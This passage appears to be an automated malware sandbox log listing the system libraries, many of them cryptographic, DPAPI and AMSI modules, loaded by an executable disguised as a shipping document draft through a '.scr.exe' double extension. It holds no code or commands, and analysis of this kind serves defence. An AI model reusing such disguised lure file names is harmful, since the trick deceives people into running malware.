Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
